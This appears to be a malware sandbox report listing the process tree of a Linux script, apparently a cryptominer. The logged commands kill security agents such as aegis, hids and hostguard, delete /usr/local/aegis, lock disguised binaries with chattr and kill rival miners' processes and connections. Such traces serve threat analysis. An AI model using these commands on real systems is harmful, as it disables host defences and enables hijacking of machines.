  2⤵
  PID:834
- /bin/grep
  grep -v grep
  2⤵
  PID:833
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:832
- /usr/bin/xargs
  xargs -I "{}" kill -9 "{}"
  2⤵
  PID:841
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:840
- /bin/grep
  grep aegis
  2⤵
  PID:839
- /bin/grep
  grep -v grep
  2⤵
  PID:838
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  - Reads runtime system information
  PID:837
- /usr/bin/xargs
  xargs -I "{}" kill -9 "{}"
  2⤵
  PID:846
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:845
- /bin/grep
  grep Yun
  2⤵
  PID:844
- /bin/grep
  grep -v grep
  2⤵
  PID:843
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:842
- /usr/bin/xargs
  xargs -I "{}" kill -9 "{}"
  2⤵
  PID:851
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:850
- /bin/grep
  grep hids
  2⤵
  PID:849
- /bin/grep
  grep -v grep
  2⤵
  PID:848
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:847
- /usr/bin/xargs
  xargs -I "{}" kill -9 "{}"
  2⤵
  - Attempts to change immutable files
  PID:856
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:855
- /bin/grep
  grep edr
  2⤵
  PID:854
- /bin/grep
  grep -v grep
  2⤵
  PID:853
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:852
- /usr/bin/xargs
  xargs -I "{}" kill -9 "{}"
  2⤵
  PID:861
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:860
- /bin/grep
  grep cloudwalker
  2⤵
  PID:859
- /bin/grep
  grep -v grep
  2⤵
  PID:858
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:857
- /usr/bin/xargs
  xargs -I "{}" kill -9 "{}"
  2⤵
  PID:866
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:865
- /bin/grep
  grep titanagent
  2⤵
  PID:864
- /bin/grep
  grep -v grep
  2⤵
  PID:863
- /bin/ps
  ps aux
  2⤵
  PID:862
- /usr/bin/xargs
  xargs -I "{}" kill -9 "{}"
  2⤵
  PID:873
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:872
- /bin/grep
  grep sgagent
  2⤵
  PID:871
- /bin/grep
  grep -v grep
  2⤵
  PID:870
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:869
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:878
- /usr/bin/xargs
  xargs -I "{}" kill -9 "{}"
  2⤵
  - Attempts to change immutable files
  PID:879
- /bin/grep
  grep barad_agent
  2⤵
  PID:877
- /bin/grep
  grep -v grep
  2⤵
  PID:876
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:875
- /usr/bin/xargs
  xargs -I "{}" kill -9 "{}"
  2⤵
  PID:885
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:884
- /bin/grep
  grep hostguard
  2⤵
  PID:883
- /bin/grep
  grep -v grep
  2⤵
  PID:882
- /bin/ps
  ps aux
  2⤵
  PID:881
- /bin/rm
  rm -rf /usr/local/aegis
  2⤵
  PID:888
- /bin/sleep
  sleep 1
  2⤵
  PID:889
- /usr/bin/chattr
  chattr -i /usr/bin/ip6network
  2⤵
  - System Network Configuration Discovery
  PID:909
- /usr/bin/chattr
  chattr -i /usr/bin/kswaped
  2⤵
  PID:911
- /usr/bin/chattr
  chattr -i /usr/bin/irqbalanced
  2⤵
  - Attempts to change immutable files
  PID:912
- /usr/bin/chattr
  chattr -i /usr/bin/rctlcli
  2⤵
  PID:914
- /usr/bin/chattr
  chattr -i /usr/bin/systemd-network
  2⤵
  PID:916
- /usr/bin/chattr
  chattr -i /usr/bin/pamdicks
  2⤵
  PID:917
- /usr/bin/chattr
  chattr +i /usr/bin/ip6network
  2⤵
  - System Network Configuration Discovery
  PID:920
- /usr/bin/chattr
  chattr +i /usr/bin/kswaped
  2⤵
  PID:921
- /usr/bin/chattr
  chattr +i /usr/bin/irqbalanced
  2⤵
  - Attempts to change immutable files
  PID:922
- /usr/bin/chattr
  chattr +i /usr/bin/rctlcli
  2⤵
  - Attempts to change immutable files
  PID:923
- /usr/bin/chattr
  chattr +i /usr/bin/systemd-network
  2⤵
  PID:925
- /usr/bin/chattr
  chattr +i /usr/bin/pamdicks
  2⤵
  PID:926
- /bin/sleep
  sleep 1
  2⤵
  PID:929
- /bin/rm
  rm -f /tmp/.null
  2⤵
  PID:944
- /sbin/sysctl
  sysctl -w "vm.nr_hugepages=128"
  2⤵
  PID:945
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:950
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:949
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:948
- /bin/grep
  grep 194.87.139.103
  2⤵
  PID:947
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:954
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:953
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:955
- /bin/grep
  grep 185.71.65.238
  2⤵
  PID:952
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:960
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:959
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:958
- /bin/grep
  grep 140.82.52.87
  2⤵
  PID:957
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:966
- /bin/grep
  grep -v -
  2⤵
  PID:965
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:964
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:963
- /bin/grep
  grep :23
  2⤵
  PID:962
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:972
- /bin/grep
  grep -v -
  2⤵
  PID:971
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:970
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:969
- /bin/grep
  grep :143
  2⤵
  PID:968
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:978
- /bin/grep
  grep -v -
  2⤵
  PID:977
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:976
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:975
- /bin/grep
  grep :2222
  2⤵
  PID:974
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:984
- /bin/grep
  grep -v -
  2⤵
  PID:983
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:982
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:981
- /bin/grep
  grep :3333
  2⤵
  PID:980
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:990
- /bin/grep
  grep -v -
  2⤵
  PID:989
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:988
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:987
- /bin/grep
  grep :3389
  2⤵
  PID:986
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:996
- /bin/grep
  grep -v -
  2⤵
  PID:995
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:994
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:993
- /bin/grep
  grep :5555
  2⤵
  PID:992
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1002
- /bin/grep
  grep -v -
  2⤵
  PID:1001
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1000
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:999
- /bin/grep
  grep :6666
  2⤵
  PID:998
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1008
- /bin/grep
  grep -v -
  2⤵
  PID:1007
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1006
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1005
- /bin/grep
  grep :6665
  2⤵
  PID:1004
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1017
- /bin/grep
  grep -v -
  2⤵
  PID:1016
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1015
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1014
- /bin/grep
  grep :6667
  2⤵
  PID:1013
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1023
- /bin/grep
  grep -v -
  2⤵
  PID:1022
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1021
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1020
- /bin/grep
  grep :7777
  2⤵
  PID:1019
- /bin/grep
  grep :8444
  2⤵
  PID:1025
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1026
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1027
- /bin/grep
  grep -v -
  2⤵
  PID:1028
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1029
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1035
- /bin/grep
  grep -v -
  2⤵
  PID:1034
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1033
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1032
- /bin/grep
  grep :3347
  2⤵
  PID:1031
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1041
- /bin/grep
  grep -v -
  2⤵
  PID:1040
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1039
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1038
- /bin/grep
  grep :10008
  2⤵
  PID:1037
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1046
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1045
- /bin/grep
  grep :13531
  2⤵
  PID:1044
- /bin/grep
  grep -v grep
  2⤵
  PID:1043
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1051
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1050
- /bin/grep
  grep :3333
  2⤵
  PID:1049
- /bin/grep
  grep -v grep
  2⤵
  PID:1048
- /bin/ps
  ps aux
  2⤵
  PID:1047
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1056
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1055
- /bin/grep
  grep :5555
  2⤵
  PID:1054
- /bin/grep
  grep -v grep
  2⤵
  PID:1053
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1052
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1061
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1060
- /bin/grep
  grep "kworker -c\\"
  2⤵
  PID:1059
- /bin/grep
  grep -v grep
  2⤵
  PID:1058
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1057
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1066
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1065
- /bin/grep
  grep log_
  2⤵
  PID:1064
- /bin/grep
  grep -v grep
  2⤵
  PID:1063
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1062
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1071
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1070
- /bin/grep
  grep systemten
  2⤵
  PID:1069
- /bin/grep
  grep -v grep
  2⤵
  PID:1068
- /bin/ps
  ps aux
  2⤵
  PID:1067
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1076
- - /usr/local/sbin/kill
    kill -9 10
    3⤵
    - Disables SELinux
    PID:1077
- - /usr/local/bin/kill
    kill -9 10
    3⤵
    - Disables SELinux
    PID:1077
- - /usr/sbin/kill
    kill -9 10
    3⤵
    - Disables SELinux
    PID:1077
- - /usr/bin/kill
    kill -9 10
    3⤵
    - Disables SELinux
    PID:1077
- - /sbin/kill
    kill -9 10
    3⤵
    - Disables SELinux
    PID:1077
- - /bin/kill
    kill -9 10
    3⤵
    - Disables SELinux
    - Reads CPU attributes
    PID:1077
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1075
- /bin/grep
  grep netns
  2⤵
  PID:1074
- /bin/grep
  grep -v grep
  2⤵
  PID:1073
- /bin/ps
  ps aux
  2⤵
  PID:1072
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1082
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1081
- /bin/grep
  grep voltuned
  2⤵
  PID:1080
- /bin/grep
  grep -v grep
  2⤵
  PID:1079
- /bin/ps
  ps aux
  2⤵
  PID:1078
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1087
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1086
- /bin/grep
  grep darwin
  2⤵
  PID:1085
- /bin/grep
  grep -v grep
  2⤵
  PID:1084
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  PID:1083
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1092
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1091
- /bin/grep
  grep /tmp/dl
  2⤵
  PID:1090
- /bin/grep
  grep -v grep
  2⤵
  PID:1089
- /bin/ps
  ps aux
  2⤵
  PID:1088
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1097
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1096
- /bin/grep
  grep /tmp/ddg
  2⤵
  PID:1095
- /bin/grep
  grep -v grep
  2⤵
  PID:1094
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1093
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1102
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1101
- /bin/grep
  grep /tmp/pprt
  2⤵
  PID:1100
- /bin/grep
  grep -v grep
  2⤵
  PID:1099
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1098
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1109
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1108
- /bin/grep
  grep /tmp/ppol
  2⤵
  PID:1107
- /bin/grep
  grep -v grep
  2⤵
  PID:1106
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  - Reads runtime system information
  PID:1105
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1116
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1115
- /bin/grep
  grep "/tmp/65ccE*"
  2⤵
  PID:1114
- /bin/grep
  grep -v grep
  2⤵
  PID:1113
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  - Reads runtime system information
  PID:1112
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1122
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1121
- /bin/grep
  grep "/tmp/jmx*"
  2⤵
  PID:1120
- /bin/grep
  grep -v grep
  2⤵
  PID:1119
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1118
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1128
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1127
- /bin/grep
  grep "/tmp/2Ne80*"
  2⤵
  PID:1126
- /bin/grep
  grep -v grep
  2⤵
  PID:1125
- /bin/ps
  ps aux
  2⤵
  PID:1124
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1135
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1134
- /bin/grep
  grep IOFoqIgyC0zmf2UR
  2⤵
  PID:1133
- /bin/grep
  grep -v grep
  2⤵
  PID:1132
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  - Reads runtime system information
  PID:1131
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1142
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1141
- /bin/grep
  grep 45.76.122.92
  2⤵
  PID:1140
- /bin/grep
  grep -v grep
  2⤵
  PID:1139
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1138
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1147
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1146
- /bin/grep
  grep 51.38.191.178
  2⤵
  PID:1145
- /bin/grep
  grep -v grep
  2⤵
  PID:1144
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1143
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1154
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1153
- /bin/grep
  grep 51.15.56.161
  2⤵
  PID:1152
- /bin/grep
  grep -v grep
  2⤵
  PID:1151
- /bin/ps
  ps aux
  2⤵
  PID:1150
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1161
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1160
- /bin/grep
  grep 86s.jpg
  2⤵
  PID:1159
- /bin/grep
  grep -v grep
  2⤵
  PID:1158
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1157
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1168
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1167
- /bin/grep
  grep aGTSGJJp
  2⤵
  PID:1166
- /bin/grep
  grep -v grep
  2⤵
  PID:1165
- /bin/ps
  ps aux
  2⤵
  PID:1164
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1174
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1173
- /bin/grep
  grep nMrfmnRa
  2⤵
  PID:1172
- /bin/grep
  grep -v grep
  2⤵
  PID:1171
- /bin/ps
  ps aux
  2⤵
  PID:1170
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1180
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1179
- /bin/grep
  grep PuNY5tm2
  2⤵
  PID:1178
- /bin/grep
  grep -v grep
  2⤵
  PID:1177
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1176
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1187
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1186
- /bin/grep
  grep I0r8Jyyt
  2⤵
  PID:1185
- /bin/grep
  grep -v grep
  2⤵
  PID:1184
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1183
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1194
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1193
- /bin/grep
  grep AgdgACUD
  2⤵
  PID:1192
- /bin/grep
  grep -v grep
  2⤵
  PID:1191
- /bin/ps
  ps aux
  2⤵
  PID:1190
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1199
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1198
- /bin/grep
  grep uiZvwxG8
  2⤵
  PID:1197
- /bin/grep
  grep -v grep
  2⤵
  PID:1196
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  - Reads runtime system information
  PID:1195
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1206
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1205
- /bin/grep
  grep hahwNEdB
  2⤵
  PID:1204
- /bin/grep
  grep -v grep
  2⤵
  PID:1203
- /bin/ps
  ps aux
  2⤵
  PID:1202
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1213
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1212
- /bin/grep
  grep BtwXn5qH
  2⤵
  PID:1211
- /bin/grep
  grep -v grep
  2⤵
  PID:1210
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1209
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1220
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1219
- /bin/grep
  grep 3XEzey2T
  2⤵
  PID:1218
- /bin/grep
  grep -v grep
  2⤵
  PID:1217
- /bin/ps
  ps aux
  2⤵
  PID:1216
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1225
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1224
- /bin/grep
  grep t2tKrCSZ
  2⤵
  PID:1223
- /bin/grep
  grep -v grep
  2⤵
  PID:1222
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1221
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1232
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1231
- /bin/grep
  grep HD7fcBgg
  2⤵
  PID:1230
- /bin/grep
  grep -v grep
  2⤵
  PID:1229
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1228
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1237
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1236
- /bin/grep
  grep zXcDajSs
  2⤵
  PID:1235
- /bin/grep
  grep -v grep
  2⤵
  PID:1234
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1233
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1242
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1241
- /bin/grep
  grep 3lmigMo
  2⤵
  PID:1240
- /bin/grep
  grep -v grep
  2⤵
  PID:1239
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1238
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1247
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1246
- /bin/grep
  grep AkMK4A2
  2⤵
  PID:1245
- /bin/grep
  grep -v grep
  2⤵
  PID:1244
- /bin/ps
  ps aux
  2⤵
  PID:1243
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1252
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1251
- /bin/grep
  grep AJ2AkKe
  2⤵
  PID:1250
- /bin/grep
  grep -v grep
  2⤵
  PID:1249
- /bin/ps
  ps aux
  2⤵
  PID:1248
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1257
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1256
- /bin/grep
  grep HiPxCJRS
  2⤵
  - System Network Configuration Discovery
  PID:1255
- /bin/grep
  grep -v grep
  2⤵
  PID:1254
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  PID:1253
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1262
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1261
- /bin/grep
  grep http_0xCC030
  2⤵
  - Disables SELinux
  PID:1260
- /bin/grep
  grep -v grep
  2⤵
  PID:1259
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1258
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1267
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1266
- /bin/grep
  grep http_0xCC031
  2⤵
  PID:1265
- /bin/grep
  grep -v grep
  2⤵
  PID:1264
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1263
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1272
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1271
- /bin/grep
  grep http_0xCC032
  2⤵
  PID:1270
- /bin/grep
  grep -v grep
  2⤵
  PID:1269
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1268
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1277
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1276
- /bin/grep
  grep http_0xCC033
  2⤵
  PID:1275
- /bin/grep
  grep -v grep
  2⤵
  PID:1274
- /bin/ps
  ps aux
  2⤵
  PID:1273
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1282
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1281
- /bin/grep
  grep C4iLM4L
  2⤵
  PID:1280
- /bin/grep
  grep -v grep
  2⤵
  PID:1279
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1278
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1287
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1286
- /bin/grep
  grep aziplcr72qjhzvin
  2⤵
  - System Network Configuration Discovery
  PID:1285
- /bin/grep
  grep -v grep
  2⤵
  PID:1284
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  PID:1283
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1291
- /usr/bin/awk
  awk "{ if(substr(\$11,1,2)==\"./\" && substr(\$12,1,2)==\"./\") print \$2 }"
  2⤵
  PID:1290
- /bin/grep
  grep -v grep
  2⤵
  PID:1289
- /bin/ps
  ps aux
  2⤵
  PID:1288
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1296
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1295
- /bin/grep
  grep /boot/vmlinuz
  2⤵
  PID:1294
- /bin/grep
  grep -v grep
  2⤵
  PID:1293
- /bin/ps
  ps aux
  2⤵
  PID:1292
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1301
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1300
- /bin/grep
  grep i4b503a52cc5
  2⤵
  PID:1299
- /bin/grep
  grep -v grep
  2⤵
  PID:1298
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1297
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1306
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1305
- /bin/grep
  grep dgqtrcst23rtdi3ldqk322j2
  2⤵
  PID:1304
- /bin/grep
  grep -v grep
  2⤵
  PID:1303
- /bin/ps
  ps aux
  2⤵
  PID:1302
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1311
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1310
- /bin/grep
  grep 2g0uv7npuhrlatd
  2⤵
  PID:1309
- /bin/grep
  grep -v grep
  2⤵
  PID:1308
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  - Reads runtime system information
  PID:1307
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1316
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1315
- /bin/grep
  grep nqscheduler
  2⤵
  PID:1314
- /bin/grep
  grep -v grep
  2⤵
  PID:1313
- /bin/ps
  ps aux
  2⤵
  PID:1312
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1321
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1320
- /bin/grep
  grep rkebbwgqpl4npmm
  2⤵
  PID:1319
- /bin/grep
  grep -v grep
  2⤵
  PID:1318
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  PID:1317
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1327
- /bin/grep
  grep -v grep
  2⤵
  PID:1323
- /bin/grep
  grep -v aux
  2⤵
  PID:1324
- /bin/grep
  grep "]"
  2⤵
  PID:1325
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1322
- /usr/bin/awk
  awk "\$3>10.0{print \$2}"
  2⤵
  PID:1326
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1332
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1331
- /bin/grep
  grep 2fhtu70teuhtoh78jc5s
  2⤵
  PID:1330
- /bin/grep
  grep -v grep
  2⤵
  PID:1329
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  - Reads runtime system information
  PID:1328
